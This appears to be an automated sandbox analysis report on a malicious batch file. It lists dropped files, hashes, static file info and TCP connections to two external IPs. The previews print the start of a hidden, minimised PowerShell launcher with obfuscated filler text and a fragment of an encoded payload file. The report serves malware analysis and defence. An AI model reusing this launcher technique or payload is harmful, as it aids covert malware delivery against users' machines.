                C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                Download File
                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                File Type:data
                Category:dropped
                Size (bytes):64
                Entropy (8bit):1.1940658735648508
                Encrypted:false
                SSDEEP:3:Nlllul/nq/llh:NllUyt
                MD5:AB80AD9A08E5B16132325DF5584B2CBE
                SHA1:F7411B7A5826EE6B139EBF40A7BEE999320EF923
                SHA-256:5FBE5D71CECADD2A3D66721019E68DD78C755AA39991A629AE81C77B531733A4
                SHA-512:9DE2FB33C0EA36E1E174850AD894659D6B842CD624C1A543B2D391C8EBC74719F47FA88D0C4493EA820611260364C979C9CDF16AF1C517132332423CA0CB7654
                Malicious:false
                Preview:@...e................................................@..........

                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_51udh1ic.30k.ps1

                Download File
                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                File Type:ASCII text, with no line terminators
                Category:dropped
                Size (bytes):60
                Entropy (8bit):4.038920595031593
                Encrypted:false
                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                Malicious:false
                Preview:# PowerShell test file to determine AppLocker lockdown mode

                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bnyza0xt.h3e.psm1

                Download File
                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                File Type:ASCII text, with no line terminators
                Category:dropped
                Size (bytes):60
                Entropy (8bit):4.038920595031593
                Encrypted:false
                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                Malicious:false
                Preview:# PowerShell test file to determine AppLocker lockdown mode

                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fatgl34k.okl.ps1

                Download File
                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                File Type:ASCII text, with no line terminators
                Category:dropped
                Size (bytes):60
                Entropy (8bit):4.038920595031593
                Encrypted:false
                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                Malicious:false
                Preview:# PowerShell test file to determine AppLocker lockdown mode

                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yq5xag10.nyw.psm1

                Download File
                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                File Type:ASCII text, with no line terminators
                Category:dropped
                Size (bytes):60
                Entropy (8bit):4.038920595031593
                Encrypted:false
                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                Malicious:false
                Preview:# PowerShell test file to determine AppLocker lockdown mode

                C:\Users\user\AppData\Local\Temp\cUb5G1h4

                Download File
                Process:C:\Windows\SysWOW64\clip.exe
                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                Category:dropped
                Size (bytes):196608
                Entropy (8bit):1.121297215059106
                Encrypted:false
                SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                MD5:D87270D0039ED3A5A72E7082EA71E305
                SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                Malicious:false
                Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                C:\Users\user\AppData\Roaming\Coumarate.Bic

                Download File
                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                File Type:ASCII text, with very long lines (65536), with no line terminators
                Category:dropped
                Size (bytes):433500
                Entropy (8bit):5.974779058415344
                Encrypted:false
                SSDEEP:12288:xFf6UwPO1oFvoX3gPRMPnmmr2xKifPaUR9C:L6PP4o+nGyPmkcjS
                MD5:007CF6A92566BEEAC721341FB07EE93E
                SHA1:8FCB0B9135D89B7CD0D038471BB901C20BEE48B7
                SHA-256:362053D0E47717D018306FF0785C59415A2C7A72A44AA1140103EFE093F584D8
                SHA-512:AAD75AA8B7E967723996369C1D6EA0F3FCED41B6748496B811024CE7202FAB5839290B91222B4CAD71D9DB53F1EFBEAB851132823DA710D6739297A21AD5CD41
                Malicious:false
                Preview:cQGbcQGbu4ePGgDrAuoq6wJwKANcJATrAo6A6wLT4bk+FGIgcQGb6wJuXYHxrKArZHEBm3EBm4HBbku2u3EBm+sCp3hxAZvrAk+7ulLOW+VxAZvrAu1+cQGb6wKuWjHK6wIbqesC4PCJFAtxAZtxAZvR4nEBm3EBm4PBBHEBm+sCi9KB+TljbgJ8zOsCkS5xAZuLRCQE6wI3vesCqNuJw+sCsY3rAkRRgcPh0WQBcQGb6wKgeboqf54h6wIpDesCz2iB8sV1/KbrAqUMcQGbgfLvCmKHcQGbcQGbcQGb6wJownEBm+sCFbyLDBBxAZvrAos1iQwT6wI7kHEBm0LrAsLMcQGbgfrEhgQAddXrAnfC6wIyKIlcJAzrAnng6wIeKoHtAAMAAOsCJ8LrAnI+i1QkCHEBm3EBm4t8JATrAuwdcQGbietxAZtxAZuBw5wAAABxAZtxAZtTcQGbcQGbakDrAgKXcQGbietxAZtxAZvHgwABAAAAAIwC6wLiZnEBm4HDAAEAAHEBm+sC/MhTcQGbcQGbievrAuiB6wJfaIm7BAEAAHEBm3EBm4HDBAEAAOsCB07rAnybU+sCvodxAZtq/3EBm3EBm4PCBXEBm3EBmzH2cQGb6wLI9DHJ6wLpynEBm4sacQGb6wLpgUHrAlYRcQGbORwKdfPrAuhZ6wJAe0brAuIEcQGbgHwK+7h13HEBm3EBm4tECvxxAZvrAjHKKfDrAry9cQGb/9JxAZtxAZu6xIYEAHEBm3EBmzHAcQGb6wIBXot8JAzrAoB+cQGbgTQH5wPReOsCr71xAZuDwATrArLj6wK01DnQdeNxAZtxAZuJ++sCCz9xAZv/1+sCsrvrAu0YZ/+L8QKCPXyX2tX5Iwe8oeNWWJ1eOTMS9IIgX2jYTPkOE9vLNYIgbYT9av0+Oy2/ow7RMJHWNvwQgqV15wqNs+yCpXXnKc8F8ocD+YsO0RPTYCj5JrALxeeCONc9vtH9NYpUL+UD

                C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms (copy)

                Download File
                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                File Type:data
                Category:dropped
                Size (bytes):6222
                Entropy (8bit):3.7070463597114873
                Encrypted:false
                SSDEEP:96:w2UCOo3kvhkvCCtoCprzXFuHvCprzXFPH0:w2yYoCprgCpry
                MD5:DD57BD1C245456586CDABAE34E206CF7
                SHA1:91DAB822C3E88587252725B54A3F25F98F35E223
                SHA-256:6534FE04F48F4DC578FAF554B69CBC6F1A2E21385CAB83A12AE5B6286DD95108
                SHA-512:06FA00F69704A687879AFC8FF93F4A44E112BB957064A1659F17B663F3E2FD1D42172908EB47E2001409AB9B117AB2B3087921D98D84C184DF0CDF29FB187670
                Malicious:false
                Preview:...................................FL..................F.".. ...d.........%....z.:{.............................:..DG..Yr?.D..U..k0.&...&...... M....... .......%........t...CFSF..1.....DWSl..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......DWSl.XwY....B.....................Bdg.A.p.p.D.a.t.a...B.V.1......XzY..Roaming.@......DWSl.XzY....C.........................R.o.a.m.i.n.g.....\.1.....DW.q..MICROS~1..D......DWSl.XwY....D.....................sy%.M.i.c.r.o.s.o.f.t.....V.1.....DW r..Windows.@......DWSl.XwY....E.......................r.W.i.n.d.o.w.s.......1.....DWUl..STARTM~1..n......DWSl.XwY....G...............D......a..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....DWWn..Programs..j......DWSl.XwY....H...............@.........P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......DWSlDWSl....I.....................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......DWSl.X}Y....q...........

                C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\Z4O0TJZ4WXZHXP70VD4P.temp

                Download File
                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                File Type:data
                Category:dropped
                Size (bytes):6222
                Entropy (8bit):3.7070463597114873
                Encrypted:false
                SSDEEP:96:w2UCOo3kvhkvCCtoCprzXFuHvCprzXFPH0:w2yYoCprgCpry
                MD5:DD57BD1C245456586CDABAE34E206CF7
                SHA1:91DAB822C3E88587252725B54A3F25F98F35E223
                SHA-256:6534FE04F48F4DC578FAF554B69CBC6F1A2E21385CAB83A12AE5B6286DD95108
                SHA-512:06FA00F69704A687879AFC8FF93F4A44E112BB957064A1659F17B663F3E2FD1D42172908EB47E2001409AB9B117AB2B3087921D98D84C184DF0CDF29FB187670
                Malicious:false
                Preview:...................................FL..................F.".. ...d.........%....z.:{.............................:..DG..Yr?.D..U..k0.&...&...... M....... .......%........t...CFSF..1.....DWSl..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......DWSl.XwY....B.....................Bdg.A.p.p.D.a.t.a...B.V.1......XzY..Roaming.@......DWSl.XzY....C.........................R.o.a.m.i.n.g.....\.1.....DW.q..MICROS~1..D......DWSl.XwY....D.....................sy%.M.i.c.r.o.s.o.f.t.....V.1.....DW r..Windows.@......DWSl.XwY....E.......................r.W.i.n.d.o.w.s.......1.....DWUl..STARTM~1..n......DWSl.XwY....G...............D......a..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....DWWn..Programs..j......DWSl.XwY....H...............@.........P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......DWSlDWSl....I.....................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......DWSl.X}Y....q...........

                Static File Info

                General

                File type:ASCII text, with very long lines (6842), with no line terminators
                Entropy (8bit):5.238110000878595
                TrID:
                  File name:rFV-452747284IN.bat
                  File size:6'842 bytes
                  MD5:4eeae7ac7c9b2b2f6585cbfdb82ffd89
                  SHA1:7978841d26d2be27f6b873a6b3fca3bd999329aa
                  SHA256:96510f0af47cb70914f106bd98fc99b4a5f782c744dbe587368f8614565a6f47
                  SHA512:149edad5906d359b943d24f900c868dca0a65aa305dd571c1cfa28e6eeaec654109ad7013d5ba149fd40c341ac50ff3510297bf390a70269faeb2244a8f5f31c
                  SSDEEP:96:gv/UAWv/UAV1161kylTQdpXxJnSI4ceniGcdZYi8KqYdoTZDm3xMtt8ln9Ex61MV:icHc81xqQTXP/uiG6D8KqYdo1exMzoYV
                  TLSH:6BE14BBAEBFF4628670A0C852DEB46577E08CD37C5768EB69784285C2041618BF2DCDC
                  File Content Preview:start /min powershell.exe -windowstyle hidden "cls;write 'Decisionen Landbrugsmssiges Sapremia157 Tandemcykels nucleli Isopropenyl Albatroserne Granden Udbredes Fluesnapperen Sideloebende Ernestines Karakterbristernes Unprejudice Udsigelsen Moonward Hoved

                  File Icon

                  Icon Hash:9686878b929a9886

                  Network Behavior

                  Network Port Distribution

                  TCP Packets

                  TimestampSource PortDest PortSource IPDest IP
                  Jul 11, 2024 13:12:01.006334066 CEST49704443192.168.2.5103.211.216.55
                  Jul 11, 2024 13:12:01.006380081 CEST44349704103.211.216.55192.168.2.5
                  Jul 11, 2024 13:12:01.006669044 CEST49704443192.168.2.5103.211.216.55
                  Jul 11, 2024 13:12:01.013674974 CEST49704443192.168.2.5103.211.216.55
                  Jul 11, 2024 13:12:01.013690948 CEST44349704103.211.216.55192.168.2.5
                  Jul 11, 2024 13:12:02.014389038 CEST44349704103.211.216.55192.168.2.5
                  Jul 11, 2024 13:12:02.014487028 CEST49704443192.168.2.5103.211.216.55
                  Jul 11, 2024 13:12:02.020668983 CEST49704443192.168.2.5103.211.216.55
                  Jul 11, 2024 13:12:02.020680904 CEST44349704103.211.216.55192.168.2.5
                  Jul 11, 2024 13:12:02.021094084 CEST44349704103.211.216.55192.168.2.5
                  Jul 11, 2024 13:12:02.031963110 CEST49704443192.168.2.5103.211.216.55
                  Jul 11, 2024 13:12:02.076500893 CEST44349704103.211.216.55192.168.2.5
                  Jul 11, 2024 13:12:02.648711920 CEST44349704103.211.216.55192.168.2.5
                  Jul 11, 2024 13:12:02.648791075 CEST44349704103.211.216.55192.168.2.5
                  Jul 11, 2024 13:12:02.648865938 CEST49704443192.168.2.5103.211.216.55
                  Jul 11, 2024 13:12:02.648874998 CEST44349704103.211.216.55192.168.2.5
                  Jul 11, 2024 13:12:02.693957090 CEST49704443192.168.2.5103.211.216.55
                  Jul 11, 2024 13:12:02.863571882 CEST44349704103.211.216.55192.168.2.5
                  Jul 11, 2024 13:12:02.863610983 CEST44349704103.211.216.55192.168.2.5
                  Jul 11, 2024 13:12:02.863679886 CEST49704443192.168.2.5103.211.216.55
                  Jul 11, 2024 13:12:02.863766909 CEST44349704103.211.216.55192.168.2.5
                  Jul 11, 2024 13:12:02.863789082 CEST44349704103.211.216.55192.168.2.5
                  Jul 11, 2024 13:12:02.863831997 CEST49704443192.168.2.5103.211.216.55
                  Jul 11, 2024 13:12:02.863936901 CEST44349704103.211.216.55192.168.2.5
                  Jul 11, 2024 13:12:02.863955975 CEST44349704103.211.216.55192.168.2.5
                  Jul 11, 2024 13:12:02.864000082 CEST49704443192.168.2.5103.211.216.55
                  Jul 11, 2024 13:12:02.864666939 CEST44349704103.211.216.55192.168.2.5
                  Jul 11, 2024 13:12:02.864737988 CEST49704443192.168.2.5103.211.216.55
                  Jul 11, 2024 13:12:03.113699913 CEST44349704103.211.216.55192.168.2.5
                  Jul 11, 2024 13:12:03.113738060 CEST44349704103.211.216.55192.168.2.5
                  Jul 11, 2024 13:12:03.113826036 CEST49704443192.168.2.5103.211.216.55
                  Jul 11, 2024 13:12:03.113826036 CEST49704443192.168.2.5103.211.216.55
                  Jul 11, 2024 13:12:03.114443064 CEST44349704103.211.216.55192.168.2.5
                  Jul 11, 2024 13:12:03.114520073 CEST49704443192.168.2.5103.211.216.55
                  Jul 11, 2024 13:12:03.115380049 CEST44349704103.211.216.55192.168.2.5
                  Jul 11, 2024 13:12:03.115453959 CEST49704443192.168.2.5103.211.216.55
                  Jul 11, 2024 13:12:03.116195917 CEST44349704103.211.216.55192.168.2.5
                  Jul 11, 2024 13:12:03.116274118 CEST49704443192.168.2.5103.211.216.55
                  Jul 11, 2024 13:12:03.117146969 CEST44349704103.211.216.55192.168.2.5
                  Jul 11, 2024 13:12:03.117213964 CEST49704443192.168.2.5103.211.216.55
                  Jul 11, 2024 13:12:03.118051052 CEST44349704103.211.216.55192.168.2.5
                  Jul 11, 2024 13:12:03.118139029 CEST49704443192.168.2.5103.211.216.55
                  Jul 11, 2024 13:12:03.119595051 CEST44349704103.211.216.55192.168.2.5
                  Jul 11, 2024 13:12:03.119673014 CEST49704443192.168.2.5103.211.216.55
                  Jul 11, 2024 13:12:03.156961918 CEST44349704103.211.216.55192.168.2.5
                  Jul 11, 2024 13:12:03.157054901 CEST49704443192.168.2.5103.211.216.55
                  Jul 11, 2024 13:12:03.366107941 CEST44349704103.211.216.55192.168.2.5
                  Jul 11, 2024 13:12:03.366146088 CEST44349704103.211.216.55192.168.2.5
                  Jul 11, 2024 13:12:03.366213083 CEST49704443192.168.2.5103.211.216.55
                  Jul 11, 2024 13:12:03.367120028 CEST44349704103.211.216.55192.168.2.5
                  Jul 11, 2024 13:12:03.367211103 CEST49704443192.168.2.5103.211.216.55
                  Jul 11, 2024 13:12:03.368069887 CEST44349704103.211.216.55192.168.2.5
                  Jul 11, 2024 13:12:03.368140936 CEST49704443192.168.2.5103.211.216.55
                  Jul 11, 2024 13:12:03.368702888 CEST44349704103.211.216.55192.168.2.5
                  Jul 11, 2024 13:12:03.368767023 CEST49704443192.168.2.5103.211.216.55
                  Jul 11, 2024 13:12:03.369296074 CEST44349704103.211.216.55192.168.2.5
                  Jul 11, 2024 13:12:03.369369984 CEST49704443192.168.2.5103.211.216.55
                  Jul 11, 2024 13:12:03.369441032 CEST44349704103.211.216.55192.168.2.5
                  Jul 11, 2024 13:12:03.369497061 CEST49704443192.168.2.5103.211.216.55
                  Jul 11, 2024 13:12:03.370054960 CEST44349704103.211.216.55192.168.2.5
                  Jul 11, 2024 13:12:03.370131016 CEST49704443192.168.2.5103.211.216.55
                  Jul 11, 2024 13:12:03.370446920 CEST44349704103.211.216.55192.168.2.5
                  Jul 11, 2024 13:12:03.370542049 CEST49704443192.168.2.5103.211.216.55
                  Jul 11, 2024 13:12:03.370699883 CEST44349704103.211.216.55192.168.2.5
                  Jul 11, 2024 13:12:03.370770931 CEST49704443192.168.2.5103.211.216.55
                  Jul 11, 2024 13:12:03.371236086 CEST44349704103.211.216.55192.168.2.5
                  Jul 11, 2024 13:12:03.371304035 CEST49704443192.168.2.5103.211.216.55
                  Jul 11, 2024 13:12:03.371484995 CEST44349704103.211.216.55192.168.2.5
                  Jul 11, 2024 13:12:03.371562004 CEST49704443192.168.2.5103.211.216.55
                  Jul 11, 2024 13:12:03.372325897 CEST44349704103.211.216.55192.168.2.5
                  Jul 11, 2024 13:12:03.372395992 CEST49704443192.168.2.5103.211.216.55
                  Jul 11, 2024 13:12:03.409002066 CEST44349704103.211.216.55192.168.2.5
                  Jul 11, 2024 13:12:03.409185886 CEST49704443192.168.2.5103.211.216.55
                  Jul 11, 2024 13:12:03.617655039 CEST44349704103.211.216.55192.168.2.5
                  Jul 11, 2024 13:12:03.617693901 CEST44349704103.211.216.55192.168.2.5
                  Jul 11, 2024 13:12:03.617742062 CEST49704443192.168.2.5103.211.216.55
                  Jul 11, 2024 13:12:03.617779970 CEST49704443192.168.2.5103.211.216.55
                  Jul 11, 2024 13:12:03.618918896 CEST44349704103.211.216.55192.168.2.5
                  Jul 11, 2024 13:12:03.618993044 CEST49704443192.168.2.5103.211.216.55
                  Jul 11, 2024 13:12:03.619241953 CEST44349704103.211.216.55192.168.2.5
                  Jul 11, 2024 13:12:03.619314909 CEST49704443192.168.2.5103.211.216.55
                  Jul 11, 2024 13:12:03.619870901 CEST44349704103.211.216.55192.168.2.5
                  Jul 11, 2024 13:12:03.619940996 CEST49704443192.168.2.5103.211.216.55
                  Jul 11, 2024 13:12:03.620002031 CEST44349704103.211.216.55192.168.2.5
                  Jul 11, 2024 13:12:03.620073080 CEST49704443192.168.2.5103.211.216.55
                  Jul 11, 2024 13:12:03.620476007 CEST44349704103.211.216.55192.168.2.5
                  Jul 11, 2024 13:12:03.620562077 CEST49704443192.168.2.5103.211.216.55
                  Jul 11, 2024 13:12:03.620834112 CEST44349704103.211.216.55192.168.2.5
                  Jul 11, 2024 13:12:03.620903969 CEST49704443192.168.2.5103.211.216.55
                  Jul 11, 2024 13:12:03.622644901 CEST44349704103.211.216.55192.168.2.5
                  Jul 11, 2024 13:12:03.622715950 CEST49704443192.168.2.5103.211.216.55
                  Jul 11, 2024 13:12:03.622931957 CEST44349704103.211.216.55192.168.2.5
                  Jul 11, 2024 13:12:03.623002052 CEST49704443192.168.2.5103.211.216.55
                  Jul 11, 2024 13:12:03.623364925 CEST44349704103.211.216.55192.168.2.5
                  Jul 11, 2024 13:12:03.623435974 CEST49704443192.168.2.5103.211.216.55
                  Jul 11, 2024 13:12:03.623575926 CEST44349704103.211.216.55192.168.2.5
                  Jul 11, 2024 13:12:03.623648882 CEST49704443192.168.2.5103.211.216.55
                  Jul 11, 2024 13:12:03.623929024 CEST44349704103.211.216.55192.168.2.5
                  Jul 11, 2024 13:12:03.623999119 CEST49704443192.168.2.5103.211.216.55
                  Jul 11, 2024 13:12:03.624213934 CEST44349704103.211.216.55192.168.2.5
                  Jul 11, 2024 13:12:03.624283075 CEST49704443192.168.2.5103.211.216.55
                  Jul 11, 2024 13:12:03.661736012 CEST44349704103.211.216.55192.168.2.5
                  Jul 11, 2024 13:12:03.661842108 CEST49704443192.168.2.5103.211.216.55
                  Jul 11, 2024 13:12:03.661895990 CEST44349704103.211.216.55192.168.2.5
                  Jul 11, 2024 13:12:03.661967039 CEST49704443192.168.2.5103.211.216.55
                  Jul 11, 2024 13:12:03.874218941 CEST44349704103.211.216.55192.168.2.5
                  Jul 11, 2024 13:12:03.874258041 CEST44349704103.211.216.55192.168.2.5
                  Jul 11, 2024 13:12:03.874330997 CEST49704443192.168.2.5103.211.216.55
                  Jul 11, 2024 13:12:03.874358892 CEST49704443192.168.2.5103.211.216.55
                  Jul 11, 2024 13:12:03.874398947 CEST44349704103.211.216.55192.168.2.5
                  Jul 11, 2024 13:12:03.874469042 CEST49704443192.168.2.5103.211.216.55
                  Jul 11, 2024 13:12:03.874610901 CEST44349704103.211.216.55192.168.2.5
                  Jul 11, 2024 13:12:03.874680996 CEST49704443192.168.2.5103.211.216.55
                  Jul 11, 2024 13:12:03.874845028 CEST44349704103.211.216.55192.168.2.5
                  Jul 11, 2024 13:12:03.874908924 CEST49704443192.168.2.5103.211.216.55
                  Jul 11, 2024 13:12:03.875092030 CEST44349704103.211.216.55192.168.2.5
                  Jul 11, 2024 13:12:03.875154972 CEST49704443192.168.2.5103.211.216.55
                  Jul 11, 2024 13:12:03.875403881 CEST44349704103.211.216.55192.168.2.5
                  Jul 11, 2024 13:12:03.875452042 CEST44349704103.211.216.55192.168.2.5
                  Jul 11, 2024 13:12:03.875468016 CEST49704443192.168.2.5103.211.216.55
                  Jul 11, 2024 13:12:03.875478029 CEST44349704103.211.216.55192.168.2.5
                  Jul 11, 2024 13:12:03.875507116 CEST49704443192.168.2.5103.211.216.55
                  Jul 11, 2024 13:12:03.875524998 CEST49704443192.168.2.5103.211.216.55
                  Jul 11, 2024 13:12:03.875984907 CEST44349704103.211.216.55192.168.2.5
                  Jul 11, 2024 13:12:03.876038074 CEST44349704103.211.216.55192.168.2.5
                  Jul 11, 2024 13:12:03.876044035 CEST49704443192.168.2.5103.211.216.55
                  Jul 11, 2024 13:12:03.876051903 CEST44349704103.211.216.55192.168.2.5
                  Jul 11, 2024 13:12:03.876092911 CEST49704443192.168.2.5103.211.216.55
                  Jul 11, 2024 13:12:03.876113892 CEST49704443192.168.2.5103.211.216.55
                  Jul 11, 2024 13:12:03.876611948 CEST44349704103.211.216.55192.168.2.5
                  Jul 11, 2024 13:12:03.876662016 CEST44349704103.211.216.55192.168.2.5
                  Jul 11, 2024 13:12:03.876673937 CEST49704443192.168.2.5103.211.216.55
                  Jul 11, 2024 13:12:03.876678944 CEST44349704103.211.216.55192.168.2.5
                  Jul 11, 2024 13:12:03.876719952 CEST49704443192.168.2.5103.211.216.55
                  Jul 11, 2024 13:12:03.876734018 CEST49704443192.168.2.5103.211.216.55
                  Jul 11, 2024 13:12:03.877224922 CEST44349704103.211.216.55192.168.2.5
                  Jul 11, 2024 13:12:03.877276897 CEST44349704103.211.216.55192.168.2.5
                  Jul 11, 2024 13:12:03.877286911 CEST49704443192.168.2.5103.211.216.55
                  Jul 11, 2024 13:12:03.877290964 CEST44349704103.211.216.55192.168.2.5
                  Jul 11, 2024 13:12:03.877331018 CEST49704443192.168.2.5103.211.216.55
                  Jul 11, 2024 13:12:03.877357006 CEST49704443192.168.2.5103.211.216.55
                  Jul 11, 2024 13:12:03.877758980 CEST44349704103.211.216.55192.168.2.5
                  Jul 11, 2024 13:12:03.877809048 CEST49704443192.168.2.5103.211.216.55
                  Jul 11, 2024 13:12:03.877813101 CEST44349704103.211.216.55192.168.2.5
                  Jul 11, 2024 13:12:03.877840996 CEST44349704103.211.216.55192.168.2.5
                  Jul 11, 2024 13:12:03.877882957 CEST49704443192.168.2.5103.211.216.55
                  Jul 11, 2024 13:12:03.881022930 CEST49704443192.168.2.5103.211.216.55
                  Jul 11, 2024 13:12:42.120249987 CEST49712443192.168.2.5185.83.114.124
                  Jul 11, 2024 13:12:42.120286942 CEST44349712185.83.114.124192.168.2.5
                  Jul 11, 2024 13:12:42.120366096 CEST49712443192.168.2.5185.83.114.124
                  Jul 11, 2024 13:12:42.129313946 CEST49712443192.168.2.5185.83.114.124
                  Jul 11, 2024 13:12:42.129329920 CEST44349712185.83.114.124192.168.2.5
                  Jul 11, 2024 13:12:52.066458941 CEST44349712185.83.114.124192.168.2.5
                  Jul 11, 2024 13:12:52.066564083 CEST49712443192.168.2.5185.83.114.124
                  Jul 11, 2024 13:12:52.130633116 CEST49712443192.168.2.5185.83.114.124
                  Jul 11, 2024 13:12:52.130664110 CEST44349712185.83.114.124192.168.2.5
                  Jul 11, 2024 13:12:52.131602049 CEST44349712185.83.114.124192.168.2.5
                  Jul 11, 2024 13:12:52.131743908 CEST49712443192.168.2.5185.83.114.124
                  Jul 11, 2024 13:12:52.134519100 CEST49712443192.168.2.5185.83.114.124
                  Jul 11, 2024 13:12:52.180500984 CEST44349712185.83.114.124192.168.2.5
                  Jul 11, 2024 13:12:52.513624907 CEST44349712185.83.114.124192.168.2.5
                  Jul 11, 2024 13:12:52.513701916 CEST44349712185.83.114.124192.168.2.5
                  Jul 11, 2024 13:12:52.513746023 CEST49712443192.168.2.5185.83.114.124
                  Jul 11, 2024 13:12:52.513763905 CEST44349712185.83.114.124192.168.2.5
                  Jul 11, 2024 13:12:52.513787985 CEST49712443192.168.2.5185.83.114.124
                  Jul 11, 2024 13:12:52.513847113 CEST49712443192.168.2.5185.83.114.124
                  Jul 11, 2024 13:12:52.692524910 CEST44349712185.83.114.124192.168.2.5
                  Jul 11, 2024 13:12:52.692657948 CEST49712443192.168.2.5185.83.114.124
                  Jul 11, 2024 13:12:52.693013906 CEST44349712185.83.114.124192.168.2.5
                  Jul 11, 2024 13:12:52.693104982 CEST49712443192.168.2.5185.83.114.124
                  Jul 11, 2024 13:12:52.694860935 CEST44349712185.83.114.124192.168.2.5
                  Jul 11, 2024 13:12:52.694950104 CEST49712443192.168.2.5185.83.114.124
                  Jul 11, 2024 13:12:52.732357979 CEST44349712185.83.114.124192.168.2.5
                  Jul 11, 2024 13:12:52.732657909 CEST49712443192.168.2.5185.83.114.124
                  Jul 11, 2024 13:12:52.869601011 CEST44349712185.83.114.124192.168.2.5
                  Jul 11, 2024 13:12:52.869738102 CEST49712443192.168.2.5185.83.114.124
                  Jul 11, 2024 13:12:52.870372057 CEST44349712185.83.114.124192.168.2.5
                  Jul 11, 2024 13:12:52.870460033 CEST49712443192.168.2.5185.83.114.124
                  Jul 11, 2024 13:12:52.870573997 CEST44349712185.83.114.124192.168.2.5
                  Jul 11, 2024 13:12:52.870656967 CEST49712443192.168.2.5185.83.114.124
                  Jul 11, 2024 13:12:52.871968031 CEST44349712185.83.114.124192.168.2.5
                  Jul 11, 2024 13:12:52.872052908 CEST49712443192.168.2.5185.83.114.124
                  Jul 11, 2024 13:12:52.872972012 CEST44349712185.83.114.124192.168.2.5
                  Jul 11, 2024 13:12:52.873075962 CEST49712443192.168.2.5185.83.114.124
                  Jul 11, 2024 13:12:52.873076916 CEST44349712185.83.114.124192.168.2.5
                  Jul 11, 2024 13:12:52.873106956 CEST44349712185.83.114.124192.168.2.5
                  Jul 11, 2024 13:12:52.873148918 CEST49712443192.168.2.5185.83.114.124
                  Jul 11, 2024 13:12:52.873178005 CEST49712443192.168.2.5185.83.114.124
                  Jul 11, 2024 13:12:52.909154892 CEST44349712185.83.114.124192.168.2.5
                  Jul 11, 2024 13:12:52.909312963 CEST49712443192.168.2.5185.83.114.124
                  Jul 11, 2024 13:12:53.254297018 CEST44349712185.83.114.124192.168.2.5
                  Jul 11, 2024 13:12:53.254338026 CEST44349712185.83.114.124192.168.2.5
                  Jul 11, 2024 13:12:53.254410982 CEST49712443192.168.2.5185.83.114.124
